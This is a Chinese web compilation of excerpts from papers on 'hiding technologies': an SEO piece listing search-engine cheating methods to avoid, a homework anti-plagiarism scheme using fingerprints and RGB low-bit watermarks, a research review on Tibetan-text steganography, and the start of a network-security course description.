隐藏技术论文汇总十篇

时间:2022-05-03 03:53:40

序论:好文章的创作是一个不断探索和完善的过程,我们为您推荐十篇隐藏技术论文范例,希望它们能助您一臂之力,提升您的阅读品质,带来更深刻的阅读感受。

隐藏技术论文

篇(1)

第二定律人气质量定律

类似于科学引文索引的机制,说白了就是谁的论文被引用次数多,谁就被认为是权威,论文就是好论文。这个思路移植到网上就是谁的网页被链接次数多,那个网页就被认为是质量高,人气旺。在加上相应的链接文字分析,就可以用在搜索结果的排序上了。这就引出了Google优化的第二定律:人气质量定律。根据这一定律,Google搜索结果的相关性排序,并不完全依赖于词频统计,Google优化更多地依赖于超链分析

第三定律自信心定律

人气质量定律解决的还是一个技术层面的问题,然而Google从诞生的那一天起,从来就不是一个纯技术现像,它融合了技术,文化,市场等各个层面的因素。解决搜索引擎公司的生存和发展问题需要Google的第三定律–自信心定律。

Google优化作弊手法:一:隐藏文本/隐藏链接

隐藏文本内容隐藏链接

二:网页与Google描述不符

一般发生于先向Google提交一个网站,等该网站被收录后再以其它页面替换该网站。“诱饵行为”就属于此类偷梁换柱之举–创建一个优化页和一个普通页,然后把优化页提交给Google,当优化页被Google收录后再以普通页取而代之。

三:误导性或重复性关键词

误导性关键词重复性关键词

四:隐形页面

对实际访问者或搜索引擎任一方隐藏真实网站内容,以向搜索引擎提供非真实的搜索引擎友好的内容提升排名。

五:欺骗性重定向

指把用户访问的第一个页面(着陆页)迅速重定向至一个内容完全不同的页面

六:门页

是为某些关键字特别制作的页面,专为Google设计,目的是提高特定关键词在Google中的排名所设计的富含目标关键词的域名,且重定向至另一域名的真实网站。Google的Spiders往往忽略对那些自动重定向到其它页的页面的检索。

七:复制的站点或网页

最常见的当属镜象站点。通过复制网站或卬页的内容并分配以不同域名和服务器,以此欺骗Google对同一站点或同一页面进行多次索引。现在Google提供有能够检测镜象站点的适当的过滤系统,一旦发觉镜象站点,则源站点和镜象站点都会被从索引数据库中删除

八:作弊链接技术/恶意链接

典型的作弊链接技术包括:

链接工厂

大宗链接交换程序

交叉链接

以上Google优化作弊技术Google目前已经可以监控出来,我们建议各位在做Google优化时不要使用上面列举的作弊技术!

正确的Google优化技术:1、标题

在网页的标题(Title标签)加上关键词,关键词数不要过多,建议为1到3个。

2、KeyWords(关键词)

KeyWords现在在Google优化规则里面不是很受重视,但是,我们必要做到的是,尽一切能力进行优化,所以,也是一定要做的。

3、Dscription(描述)

Dscription0尽可能的反复出现需要优化的关键词,但是语法一定要通顺,流畅。符合浏览者搜索该关键词的用意以及感受。也要符合网页内容的含义,最好能概括网页的内容,杜绝虚假。

4、网站框架结构

尽量少使用图片、FLASH、JS等文件,让Google更好的抓去站点的信息,站内链接要合理的设计。

篇(2)

中图分类号:TP311 文献标识码:A 文章编号:1009-3044(2012)36-8679-02

随着计算机应用的普及,高校正在逐步实现作业的电子化和网络化。这种作业形式的改革有效减少了教育资源的浪费,减轻了教师的工作任务,提高了学生获得作业批阅结果的效率,教与学得到了互动。应该说作业的电子化是高校教学改革的一种必然趋势,但随之而来的是电子作业抄袭现象严重。学生抄袭作业时,少则部分复制他人文档,调整文档顺序,内容稍做修改;多则大部分甚至全盘拷贝他人文档。学生对于电子作业的抄袭轻松快捷又不易被识别,这就成为作业改革受到严重困扰的主要因素。

在电子作业的反抄袭检查工作上,教师的手工操作既耗时又费力,尤以高校学生人数众多,涉及的教师面而变得局限性很大。那么,建立一种快速、准确、高校的电子作业反抄袭检查模型若能够有效遏制了学生间电子作业相互拷贝,具有十分现实的意义。目的在于能够极大地提高教学的质量和效率,并有力的促进高校的教育改革。在应用领域抄袭检测算法已成为当前研究的热点话题,尤其是在学术论文的剽窃比对上。而我们能够在平时的教学工作中有效地抵制电子作业的抄袭现象,既能真实反映教学效果又能提高学生自主学习的意识和能力。这不仅是对于教学工作的促进更是培养人教育人的有效途径。

1 抄袭检查技术

计算机技术的发展和网络普遍应用,在无意间方便了很多人进行文章抄袭。其实电子作业抄袭现象是国内外的大学广泛存在的现象,为了有力遏制学生的这种不诚信的行为,国外早在20世纪90年代就开始了相应研究。由于西方语系的特点英语是以空格作为单词间隔,因此英语的抄袭检查方法是通过比较关键词来判断相似性的,效率很高。而中文与外文间存在着巨大的差异性, 强调词法与句法,因此关键词比对较不适用于中文。

目前中文的抄袭检查方法主要有基于字符串的匹配、基于统计的中文分词、文档指纹、句子相似度等。

2 电子作业反抄袭检查的实现

该文主要采用两种方法以实现电子作业的反抄袭检查:数字指纹技术和信息隐藏技术。首先吸取了文数字指纹技术的优势并对于指纹技术的算法(Hash函数)做出改进提出一种基于局部词频的指纹算法。其次很多高校特有应用的实验实习电子作业,此时内容都较为相似,所以该文又增加了基于信息隐藏技术的作业反抄袭检查方法,以对于这类电子作业进行有效的比对。

2.1基于局部词频的指纹技术

文档数字指纹技术是依据生成的待比较的文档指纹,通过在样本库中做对比进行抄袭检测。当相匹配指纹数目超过一定值时,可认定存在抄袭行为。为使其具有推广力,一般会引入松弛因子以提高检测的准确性。指纹生成算法是文档数字指纹技术的关键,一般利用 Hash 函数对文档中的特征标记进行计算,获得整数值。一般需要计算函数。

在高校的电子作业中很多都仅是对作业的句子的长度或词语的先后次序作了调整,内容的变化是较小的,用这种方法就会过度精确,用于检查电子作业效率很低。所以该文对这种算法做出一定改进,提出一种基于词频统计的指纹技术。局部词频统计技术借助于向量空间模型来实现。这种向量空间模型是由句子为单位构成的,并对句子进行关键词提取,并对关键词重新排序构建,根据编码与词频共同获取句子的指纹。依据句子的指纹获取文本相似度,具体的算法描述

2.2信息隐藏技术

在高校学生作业有一些是比较特殊的,例如在机房中完成的实验实习类报告,这类作业的特点是内容大致是相同的。可以在作业的源头采用一些基于信息隐藏的嵌入水印算法。在对作业进行片段拷贝时就在源头嵌入水印,能有效的防止拷贝抄袭的现象发生。这样即使电子作业的内容完全相同也能有效的检查到。不能轻易被破坏。这类作业防抄袭检查的水印嵌入既要求字符格式改变不易被擦觉也要兼顾有较大的信息嵌入量,不需太多的字符就能嵌入进机房的机器号及上机完成作业的时间。

由于人眼的视细胞对颜色敏感度的理论指出人眼对绿色最敏感,其次是红色,而对于蓝色是最不敏感的。而计算机的颜色设置理论是数字化的,所以可以对于RGB()的值中低位的值做秘密信息嵌入。可以对R值和G值改变都改变最低的1位bit,而对B值最低的2位bit。这样就对每个电子文档的字符嵌入了4位bit的信息隐藏,并把这4位二进制作为嵌入信息隐藏1Byte的高4位。同时也可以利用字符下划线的B值最低2位bit,G值的最低1位bit,和R值的最低1位bit来隐藏4位信息。这4位bit作为嵌入信息隐藏1Byte的低4位。

在实际操作中程序所嵌入的信息包括程序读取的机器号及上机时间与机房管理系统数据库配合能准确定位学生的学号、姓名、班级等。当学生完成自己的电子作业过程中点击保存、Word程序自动保存、关闭Word文档时都会触发这一嵌入秘密信息的相关程序的运行,可以在全文实现循环嵌入秘密信息的作用。该反抄袭程序是在打开作业文档时自动运行,能自主识别学生作业中具有抄袭嫌疑的片段,协助教师对学生的作业给出客观评价,有效的对这类作业的抄袭起到屏蔽的作用。

3 结束语

在以往的反抄袭检查中主要是通过文档间内容重叠程度或者相似程度来断定的,相关的检查技术也很多也较成熟。但往往面对的是海量数据或是长文档,并需要对文档字符做精确检查。而在教学过程中的电子作业无论在内容、篇幅和数量方面都有很大差别。

该文的创新点是结合了基于局部词频的指纹技术和嵌入水印的信息隐藏技术,提出了一处主要针对高校的作业特点的反抄袭检查的模型。较为全面的考虑到了这类作业不同于学术剽窃的相关问题,所建立的这种快速、准确、高效的电子作业反抄袭检查模型能够在一定程度上遏制学生间电子作业相互拷贝,具有十分现实的意义。

参考文献:

[1] 蒋波.一种基于三重DES和RSA的综合加密方案[J].微计算机信息,2007(18).

[2] 陈国良.并行算法实践[M].北京:高等教育出版社,2004.

[3] 秦玉平,冷强奎,王秀坤,等. 基于局部词频指纹的论文抄袭检测算法[J].计算机工程,2011(6).

篇(3)

中图分类号:TN401 文献标识码:A 文章编号:2095-1302(2014)12-00-05

0 引 言

安全、有效的信息传输对国家安全、社会稳定和人民安居乐业至关重要。网络和多媒体技术的发展,使得信息传输的速度和数量正以惊人的增量发展。然而,信息传输的便利在方便人们的同时也给信息安全带来了隐患,同时也为基于数字载体的秘密信息传输提供了广阔的研究空间。目前,基于载体的秘密信息传输是信息安全领域的一个方兴未艾的研究热点。而基于载体预处理的藏文信息隐藏技术将为信息安全领域提供一些新的数字信息共享和传输理念,特别是藏文的预处理规律、在数字信息中的隐藏规律等,将有助于涉藏秘密通信技术的发展,并可以对民用和商用领域中涉及到藏文内容的传输、共享、存储和提取的通信过程起到安全保护、版权保护及完整性认证的作用,并对国家涉藏领域的网络舆情监控、国内外涉藏敏感信息标注和情感色彩认知起着至关重要的作用。

在藏文信息隐藏技术方面,目前主要涉及的技术有关键字识别、字符识别和提取、韵律认知、语义角色标注、文本资源挖掘和语料抽取等,并以此为基础进行置乱优化。

1 国内外信息隐藏技术研究现状

信息隐藏一直是信息安全领域中保障隐秘信息安全传输和数字信息版权的重要手段,也是近年来国内外学者研究的热点之一。最新的一届ACM信息隐藏和多媒体安全会议(ACM IH&MMSec’13 Workshop)的主要研究内容有信息隐藏算法、多媒体水印和认证、载体运算域的数字信号处理等。其中,信息隐藏算法的设计首先依赖于载体的选择和预处理;关于多媒体水印和认证的研究则将信息隐藏和数字水印的载体范围从数字图像等常见载体拓展到了包括三维模型在内的新型载体上;载体运算域的数字信号处理涉及到了载体预处理时所用的具体方法,如空间域或变换域等。2013年IEEE 图像处理国际会议(IEEE ICIP 2013)的主要研究内容包括图像、音视频和3-D等多媒体的信息隐藏算法和多媒体特征提取和分析等,这两类研究内容均与载体的选取和预处理有关。最新一届信息隐藏国际会议(IH2012)的主要研究内容包括多媒体安全和其他载体的信息隐藏。我国的第十一届全国信息隐藏暨多媒体安全学术大会(CIHW2013)中关于信息隐藏算法的研究内容也主要集中在非常规载体的分析和预处理上。

藏文作为信息隐藏领域一种新的信息格式,对其研究主要局限于藏文操作系统、藏文信息技术标准、藏文信息处理等几个方面[1],具体内容集中在藏文编码字符集、术语集、拼音辅助集等的建立。

基于载体的秘密通信技术是20世纪90年代中期发展起来的跨领域的学科,而载体的预处理技术一直是其研究的主要方向。对隐藏载体进行预处理,生成信息隐藏嵌入区域是信息隐藏算法中最重要的研究内容之一。从上述国内外各学术会议中关于信息隐藏的参会论文和研讨情况看,各类载体固有特性的研究对预处理技术有着重要的意义,且数字图像依然是主要的一类载体,而三维模型将是未来主要研究的一类非常规载体。下面就对数字图像和三维模型两类载体的预处理技术的研究现状进行阐述。

1.1 数字图像预处理技术研究综述

基于数字图像的信息隐藏技术是信息隐藏学科中重要的技术分支,是目前应用最广、覆盖范围最大的信息隐藏技术手段。在基于数字图像的信息隐藏技术研究中,信息隐藏区域的生成是关系算法性能的重要因素。信息隐藏区域的生成方法主要包括空间域生成法、变换域生成法以及空间域和变换域联合的生成方法。

空间域算法:作为空间域算法中出现最早、操作最简单且应用最广泛的算法,基于位平面分解理论的LSB算法可以直接替换的方式隐藏较大的数据量,刘红翼等提出的一种LSB算法具有容量大、运算量小的特点[2];刘文彬等提出的LSB隐写替换的消息定位方法则可以对此类算法进行检测[3];而IH2012的论文中,有学者运用假设检验理论和含秘载体的奇偶感知特性可有效地检测LSB算法所隐藏的隐秘信息[4,5],这些研究为藏文信息隐藏中涉及到关于此类算法的抗检测性研究提供了新的待改进方向。张焱等提出的像素值排序和赵彦涛等提出的直方图修改等空间域算法在沿用LSB直接替换的隐藏理念的同时,还提升了鲁棒性,因此也被广泛用于数字图像载体预处理[6,7];随后,杨春芳等提出了针对此类算法的检测方法[8],这也为针对此类算法抗检测性改进的研究提供了重要依据。此外,上述同类算法中的载体子区域划分思想、内容自适应思想等也对本项目基于载体结构特性建立空间匹配模型的机制提供了方法学上的有力支持[9-13]。

变换域算法:不同于空间域算法直接对载体的空间特性进行修改,变换域预处理方法以修改载体的频率参数来隐藏信息[14],因此算法的鲁棒性比空间域算法好。在此基础上,唐燕等又对隐秘信息的检测和恢复进行了研究和改进,实现了几乎无需原始参量的半盲提取[15]。尽管变换域算法不具备空间域算法容量大、运算量小和易操作等优势,但是变换域中的多小波理论因其同时具有对称性、短支撑性、二阶消失矩和正交性等特性成为了信号处理中有明显优势且较常用的方法,在前期研究中利用多小波方法将数字图像载体分块后作为嵌入区域,提高了算法的鲁棒性和不可见性[16,17],这种方法为在藏文信息隐藏研究中建立基于区域能量的阶梯性分布机制提供了一种研究手段。

混合域算法:较单独运用一种空间域或变换域生成隐藏区域并设计信息隐藏算法来看,基于空间域与变换域联合的信息隐藏算法可以兼有多种算法的性能优势。在基于空间域和变换域联合的信息隐藏算法中,空间域的作用体现在数据嵌入的具体操作方面,因为隐藏的实质就是在当前环境下的空间分量上进行数据修改,利用边缘像素值差分(Edged Pixel Value Differencing,EPVD)将载体换算为若干个像素块,以最大斜角的数据修改作为信息隐藏的具体方法[18];利用湿纸码和基于LSBM的双层隐写来对载体进行加1嵌入或减1嵌入[19];另外,国内外许多学者利用调色板理论进行数据嵌入[20,21]。而变换域在载体预处理中的主要作用是生成满足特定需要的信息隐藏环境(区域),主要包括变换后的系数分布以及n阶分量子图等。如对RSV颜色空间的V分量做DCT变换,分块后作为嵌入区域[22];利用视觉显著点技术确定跟踪窗(Regions of Interest,ROI),在ROI的DCT系数上嵌入隐藏信息,并指定某个ROI边缘地图脆弱性标识,嵌入到DWT变换后的含密图像中[23];前期研究中,研究人员利用自适应颜色迁移理论中lαβ域对颜色的控制力,消除了RGB颜色分量的强相关性,并结合GHM能量分区隐藏信息,在不可见性、嵌入信息量和鲁棒性方面均具有较好的表现[24]。

1.2 三维模型预处理技术研究综述

潘志庚等将基于三维模型的信息隐藏预处理方法主要分为空间域算法和变换域算法[25]。这也这为藏文信息隐藏研究提供了新的思路和方法。

空间域算法:空间域算法通常具有易嵌入和盲提取的特点,如直接置换载体的几何信息来隐藏数据是三维模型载体信息隐藏最原始、最直接的方法[26]。为改进此类算法的鲁棒性,引入仿射不变量是有效的措施,如利用具有连续解析性的仿射不变量优化需要置换的顶点[27]、 将稳态锚点通过三角垂心编码解析为聚类元素从而嵌入隐秘信息[28]。此外,基于主元分析的算法也有助于改善空间域算法的鲁棒性,例如可根据主元分析(Primary Component Analysis,PCA)来确定模型的关键位置作为鲁棒区域,并用网格分割法改进鲁棒性和不可见性[29-32]。这类算法也为藏文信息隐藏从载体结构特性进行解析和预处理提供了理论依据。改进型的空间域算法多针对鲁棒性或容量性有所提升,如基于连续解析性的体积矩的盲算法,改善了之前算法对连通性攻击的鲁棒性[33];通过重排顶点和面片在网格文件中的表示信息,利用表示域内的信息进行嵌入使算法具有良好的不可见性和大容量性[34],但对相似变换以外的攻击不具有鲁棒性。

变换域算法:三维模型预处理的变换域方法大多利用频谱分析将模型信息参数化[35],对参数进行少量修改后以隐藏信息,其中,基于小波变换的算法可以对规则和非规则网格模型进行小波域参量修改以嵌入较多信息[36]。理论上,变换域算法比空间域算法鲁棒性强,但由于三维模型顶点的天然无序性和不规则性,对其进行频谱分析难度大,导致变换域算法实用性目前较低,因此空间域算法依然是比变换域算法更有实用价值的研究方向[37]。

2 藏文信息隐藏技术研究现状

目前反映藏文信息处理技术最新进展的文献较少,综合以已有的研究成果及相关研究文献,藏文信息处理可划分为藏语信息处理和藏字信息处理两个层次[38,39]。藏语信息处理包括机器翻译、信息检索、信息提取、文本校对、文本生成、文本分类、自动摘要以及藏文字识别和语音识别的后处理等等;而藏字信息处理包括操作系统以及编码字符集、输入技术、字形描述与生成、存储、编辑、排版、字频统计和藏字属性库等。这些研究基础对藏文信息隐藏技术的发展至关重要,是基于载体预处理的藏文信息隐藏的主要技术来源。鉴于藏文的独特构造,以及藏文的特点,目前对藏文秘密信息的预处理技术一般指置乱和加密算法的选择[40],而置乱使信息变得杂乱无章难以辨认,可以起到加密与改变信息嵌入特性的作用。可用于藏文信息隐藏的置乱算法主要有Arnold变换、幻方矩阵、Gray码变换、混沌序列等方法[41]。其中,Arnold变换算法简单且置乱效果显著,使有意义的数字图像变成像白噪声一样的无意义图像,实现了信息的初步加密和信息结构的调整,在嵌入信息为数字图像时可以很好的应用[42]。幻方置乱的思想基于查表思想,基于数字图像的幻方置乱可降低幻方置乱阶数或以图像块进行置乱,实现置乱效果与系统开销的平衡[43]。Gray是一种具有反射特性和循环特性的单步自补码,它的循环、单步特性消除了随机取数时出现重大误差的可能,它的反射、自补特性使得求反非常方便[44]。混沌的优势在于对初始条件的极端敏感和轨迹在整个空间上的遍历性。根据经典的Shannon置乱与扩散的要求,这些独特的特征使得混沌映射成为信息隐藏嵌入算法的优秀候选[45]。上述传统的置乱算法一般用于正方形图像处理,而经过改进的Arnold算法可直接用于宽高不等的矩形图像而不必进行正方形扩展[46],这也将是藏文信息隐藏技术所采用的主要置乱方法之一。

3 藏文信息隐藏技术的研究目标、研究内容和要解决的问题

3.1 研究目标

面向藏文安全通信的高性能信息隐藏算法是目前藏文信息隐藏技术的主要目标,包括提出性能出色的、适合藏文通信要求的信息隐藏算法;提出一种具有普适性的高性能信息隐藏嵌入区域生成原则和嵌入规则:

(1) 基于数字图像的藏文信息隐藏算法:提出至少两种基于数字图像的藏文信息隐藏算法,算法将同时满足面向藏文安全的信息隐藏应用所要求的高不可见性(PSNR≥34.90dB)、强鲁棒性(抗击大约69%以下的JPEG2000压缩、35%以下的剪切及常见滤波与加噪)、大容量性(基于彩色图像的信息隐藏信息嵌入率≥18%)以及高感知篡改性(检测隐藏数据是否被篡改能力≥95%)。

(2) 基于三维模型的藏文信息隐藏算法:提出至少一种基于三维模型的藏文信息隐藏算法。算法将同时满足面向藏文安全的信息隐藏应用所要求的高不可见性(RSNR≥69.94dB、En≥70%)、应对一般攻击的强鲁棒性(抗击大约0.10%随机加噪、50-times Laplacian平滑、50%均匀重网格化以及均匀简化等)、大容量性(相对理想的RSNR,嵌入率≥29%)以及低复杂度(根据载体模型几何信息量而变化)。

(3) 普适性信息隐藏嵌入区域生成原则和嵌入规则:利用载体图像能量和复杂度特性,提出基于能量性和复杂度的藏文信息隐藏区域生成原则和嵌入规则,将适应于所有对数字图像处理后有能量区别的图像处理方法,指导设计者利用能量与鲁棒性、复杂度与不可见性的对应关系,研究出同时满足不可见性和鲁棒性的信息隐藏算法。

3.2 研究内容

(1) 藏文信息隐藏区域生成原则与规则研究:数字图像信息隐藏技术的研究核心集中在隐藏区域和嵌入规则的设计上,藏文信息隐藏算法的设计方法和思路就是在选定藏文信息隐藏区域以及制定好信息隐藏规则后,按照一定的顺序将两者进行合理的组织,所以研究藏文信息隐藏区域生成原则以及信息隐藏规则是重点。

(2) 基于数字图像的藏文信息隐藏算法研究:隐藏算法是基于数字图像的信息隐藏技术的研究核心,需按照嵌入域进行划分,对基于空间域和基于变换域的信息隐藏算法分别进行研究,提出单独基于空间域、单独基于变换域以及两者联合应用的数字图像信息隐藏算法。

(3) 基于三维模型的藏文信息隐藏算法研究:首先对三维模型的结构特性和能量特性进行研究,再根据载体模型的特性找出对应的预处理方法。在研究基于空间域和基于变换域的信息隐藏算法的基础上,提出改进型的三维模型信息隐藏算法。主要用于提升载体有效嵌入容量和降低载体视觉失真度。

(4) 载体与藏文秘密信息的一致化方法研究:基于上述研究基础,生成结构和能量差异化子区域,再将藏文秘密信息按照拼音属性进行解析生成信息序列。再利用优化算法使得预处理后的载体信息和藏文秘密信息的解析编码获得最大一致化,从而提高算法性能。

3.3 需解决的关键问题

综合已有的研究,在藏文信息隐藏技术方面,目前需要解决的问题有以下几个方面:

(1) 信息隐藏区域与嵌入规则设计:在具有什么性质的区域内应用什么样的规则进行藏文信息隐藏才可以解决“不可见性与鲁棒性的对立、容量性与抗分析性的对立”问题,是藏文信息隐藏研究领域的关键技术之一。需找出隐藏区域的性质与信息隐藏性能的关系,提出面向藏文信息传输的信息隐藏区域选择的原则与方法;给出在具有具体性质的嵌入区域中的藏文信息隐藏嵌入规则的制定原理和方法;提出大量的藏文信息数据转换思想与方法,以提供形式多样的信息隐藏嵌入规则。

(2) 数字图像载体预处理方法:①多小波理论在载体预处理中的应用。对于数字图像经过多小波变换后所具有的特殊性质,找出多小波变换后数字图像所具有的能量特性与基于数字图像信息隐藏算法性能之间所遵循的规律已有学者进行研究。②颜色空间的性能分析与应用选取。RGB、CMYK、lαβ、YUV以及HSx颜色空间,应用方法以及应用各有优劣势。该技术的应用难点在于为颜色空间在藏文信息隐藏的应用提出完备的应用方案,因为这些颜色空间在藏文信息隐藏技术中的应用目前非常少,应用优劣还处于实验验证阶段,没有理论验证的支持。

(3) 三维网格模型载体预处理方法:骨架抽取和内切球解析技术在藏文信息隐藏算法中的应用。这种方法不涉及顶点数量及坐标的改变和拓扑关系的修改。难点在于寻找一个理想的仿射不变量作为辅助参数以弥补算法对缩放攻击的脆弱性。

(4) 藏文的置乱与遗传优化算法:有的藏文字处理系统把藏文看成是由30个辅音、4个元音、3个上加字、5个下加字共42个藏文字符组成的,而有的则认为由其他数量的字符组成。基于对藏文中加字对发音的影响规律的研究,利用字符与二进制码的解析规则和置乱与优化技术对信息置乱,达到隐藏信息与载体信息的最大匹配度也是一个技术难点。

4 藏文信息隐藏技术研究的新方法

(1)利用载体图像能量和复杂度特性,提出基于能量性和复杂度的藏文信息隐藏区域生成原则和嵌入规则。高能量与强鲁棒、高复杂度与高不可见性的对应关系,从根本上解决藏文信息隐藏算法中不可见性和鲁棒性的对立问题,为面向藏文通信安全的信息隐藏算法的设计给出一种普适性方法。

(2)根据数字图像信息隐藏嵌入区域的生成原则和嵌入规则,提出新的、高性能的数字图像的藏文信息隐藏算法。算法利用lαβ等颜色空间转换以及多小波对载体图像进行的处理,生成具有不同能量特性的嵌入区域,从频率域上满足藏文信息隐藏的应用要求;通过对载体图像进行颜色迁移、矢量解析以及环形处理,从数字图像的空间结构上满足藏文信息隐藏的应用要求。

(3)提出满足三维模型结构特性和能量特性的藏文信息隐藏算法。算法利用局部高度理论和均值偏移理论对载体模型进行预处理,生成具有不同能量特性的嵌入区域,从频域上满足信息隐藏的应用要求;通过对载体图像进行骨架抽取、内切球解析,从空间结构上满足藏文信息隐藏的应用要求。

参考文献

[1]陈玉忠,俞士汶. 藏文信息处理技术的研究现状与展望[J]. 中国藏学. 2003(4):97-107.

[2]刘红翼,王继军,韦月琼,等.一种基于LSB的数字图像信息隐藏算法[J].计算机科学,2008, 35(1):100-102.

[3]刘文彬,刘九芬.一种针对LSB替换隐写的消息定位方法[J].信息工程大学学报,2013,14(6):641-646.

[4] R. Cogranne, C. Zitzmann, F. Retraint,et al. Statistical Detection of LSB Matching Using Hypothesis Testing Theory[C].In: Proceedings of the 14th International Conference on Information Hiding,2013.

[5] J. Fridrich, J. Kodovsky. Steganalysis of LSB Replacement Using Parity-Aware Features[C]. In: Proceedings of the 14th International Conference on Information Hiding, 2013.

[6] 张焱,张敏情,瓮佳佳.基于直方图对的大容量信息隐藏算法[J].计算机应用研究,2013,30(7):2108-2111.

[7] 赵彦涛,李志全,董宇青.基于排序和直方图修改的可逆信息隐藏方法[J].光电子.激光,2010,2(1):102-106.

[8] 杨春芳,刘粉林,罗向阳.基于相对熵的直方图差异与JPEG隐写的定量分析[J].计算机研究与发展, 2011,48(8):1563-1569.

[9] 熊志勇,王江晴.基于差分直方图平移的彩色图像可逆信息隐藏[J].四川大学学报,2011,43(3): 81-89.

[10] Z.H. Wang, C.F. Lee, C.Y. Chang. Histogram-shifting-imitated reversible data hiding[J]. The Journal of Systems and Software, 2013,86(2): 315-323.

[11] X.L. Li, J. Li, B. Li, et al. High-fidelity reversible data hiding scheme based on pixel-value-ordering and prediction-error expansion[J].Signal Processing,2013, 93(1): 198C205.

[12] X.T. Wang, C.C. Chang, T.S. Nguyen, et al. Reversible data hiding for high quality images exploiting interpolation and direction order mechanism[J]. Digital Signal Processing, 2013,23(2): 569C577.

[13] Nabin Ghoshal, Anirban Goswami, H. S. Lallie. Adaptive Steganography for Image Authentication Based on Chromatic Property[C]. In: Proceedings of the International Conference on Frontiers of Intelligent Computing: Theory and Applications (FICTA),2013.

[14]和红杰,张家树.对水印信息篡改鲁棒的自嵌入水印算法[J].软件学报,2009,20(2):437-450.

[15] 唐燕,闾国年,殷奎喜.规范类正交矩阵的信息隐藏算法[J].东南大学学报,2013,43(1):45-49.

[16] T. Zhang, D.J. Mu, S. Ren, et al. Study of reversible information hiding scheme based on CARDBAL2 and DCT[C].Proceedings-2010 3rd IEEE International Conference on Broadband Network and Multimedia Technology (IC-BNMT2010),2010.

[17] T. Zhang, D.J. Mu, S. Ren. A Confidential Communication-Oriented Information Hiding Algorithm based on GHM multi-wavelet and DCT[J].Applied Mathematics & Information Sciences,2013, 7(5): 1803-1807.

[18] H.B. Kekre, P. Halarnkar, K. Dhamejani. Capacity increase for information hiding using maximum edged pixel value differencing[J].Communications in Computer and Information Science,2011, 145(1): 190-194.

[19] 奚玲,平西建,张韬.整数小波域湿纸码自适应信息隐藏算法[J].计算机辅助设计与图形学学报,2011,2(7):1217-1223.

[20] H. Zhao, H.X. Wang, M.K. Khan. Steganalysis for palette-based images using generalized difference image and color correlogram[J].Signal Processing, 2011,91(11): 2595-2605.

[21] A. Lamgunde, A. Kale. Palette based technique for image steganography[J].Communications in Computer and Information Science, 2011,125(2): 364-371.

[22] Y.J. Qiu, H. T. Lu, N. Deng, et al. A robust blind image watermarking scheme based on template in Lab color space[C].2011 International Conference on Computing, Information and Control(ICCIC 2011),2011.

[23] L.H. Tian, N.N. Zheng, J.R. Xue, et al. An intergrated visual saliency-based watermarking approach for synchronous image authentication and copyright protection[J].Signal Processing:Image Communication,2011,31(2): 9-64.

[24] 任帅,张|,慕德俊,等.基于GHM多小波与自适应颜色迁移的信息隐藏算法研究[J].西北工业大学学报,2010,28(2):64-269.

[25] 潘志庚, 孙树森, 李黎.三维模型数字水印综述[J].计算机辅助设计与图形学学报,2006,18(8):1103-1110.

[26] S.H. Lee, K.R. Kwon. VRML animated model watermarking scheme using geometry and interpolator nodes[J].Computer-Aided Design,2011,43(8): 1056-1073.

[27] M. Luo, A.G. Bors. Surface-preserving robust watermarking of 3-D shapes[J].IEEE Transactions on Image Processing, 2011,20(10): 2813-2826.

[28] L. Du, X.C. Cao, M.H. Zhang, et al. Blind Robust Watermarking Mechanism Based on Maxima Curvature of 3D Motion Data[C]. In: Proceedings of the 14th International Conference on Information Hiding,2013.

[29] Z.Q. Yao, R.J. Pan, F.H. Li, et al. A mesh partitioning approach for 3D mesh oblivious watermarking[J].Chinese Journal of Electronics, 2010,19(4): 651-655.

[30] S. Cai, X.K. Shen. Octree-based robust watermarking for 3D model[J].Journal of Multimedia, 2011,6(1): 83-90.

[31] S. Cai, X.K. Shen. OTP-W:Octree partition-based 3D mesh watermarking[C].Second International Workshop on Education Technology and Computer Science,2010.

[32] 廖学良,王屏.一种新的三维模型水印嵌入空域算法[J]. 计算机学报,2008, 31(10): 1848-1856.

[33] K. Wang, G. Lavouéa, F. Denisb, A. Baskurt. Robust and blind mesh watermarking based on volume moments[J].Computers & Graphics,2011, 35(1): 1-19.

[34] I.L. Chung, C.M. Chou, D.C. Tseng. Hiding data in triangle meshes by rearranging representation order[J].International Journal of Innovative Computing, Information and Control,2011, 7(6): 3419-3435.

[35] 胡敏,刘辉.基于特征点的自适应三维网格数字水印算法[J].合肥工业大学学报(自然科学版),2010,33(1):55-59.

[36] M. Hachani, A.Z. Ouled, S. Bahroun. Wavelet based watermarking on 3D irregular meshes[C]. 19th IEEE International Conference on Image Processing(ICIP),2012.

[37] Y.P. Wang, S.M. Hu. Optimization approach for 3D model watermarking by linear binary programming[J].Computer Aided Geometric Design, 2010,27(5): 395-404.

[38]陈力为. 中文信息处理丛书序言[M].北京:清华大学出版社,2000.

[39]俞士汶,朱学锋,贾玉祥. 汉语隐喻自动处理研究之概况[C].第四届文学与信息技术国际研讨会,2008.

[40] 谭良,吴波,刘震,等.一种基于混沌和小波变换的大容量音频信息隐藏算法[J].电子学报,2010,38(8):1812-1819.

[41] 丁玮,闫伟齐,齐东旭.基于置乱与融合的数字图象隐藏技术及其应用[J].中国图象图形学报,2000,5(8):644-649.

[42] 田云凯,贾传荧,王庆武.基于Arnold变换的图像置乱及其恢复[J].大连海事大学学报:自然科学版,2006,32(4):107-109.

[43] 彭万权,张承畅,冯文江,等.多阶幻方卷积码的构造及译码[J].电子学报,2013,41(1):123-130.

篇(4)

随着网络中信息安全事件的不断升温,网络安全教育也越来越受到高校重视。各大高校纷纷开设该类课程。本校计算机科学与技术、信息工程等专业都相继开设《网络与信息安全》、《信息安全》、《信息安全技术》等课程,普及网络安全知识,提高学生的网络安全技能,增加网络安全意识。以《网络与信息安全》课程为例,课程分配学分为4.0,采用“2+2”模式教学,其中理论2.0为课堂教学和课堂讨论课时,实验2.0为实验课时,即每周理论2节课,单周理论课时,双周讨论课,实验课每周2节课。该课程的体系结构如图1所示。[1,2]

教学过程中的基础内容

《网络与信息安全》课程分为三大模块:①网络安全基本知识概述。该模块主要讲述了网络安全的发展和现状问题,列举网络安全问题引发的各种不同影响的案例。②网络攻击技术。该模块主要讲述网络中的一些攻击现象、攻击行为以及攻击工具等。③密码学模块。该模块主要讲述古典密码学和现代密码学的一些应用,以及信息隐藏技术的一些实际作用等。④网络防护技术。该模块主要讲述网络中针对安全的一些防护措施,如防火墙、入侵监测系统等。

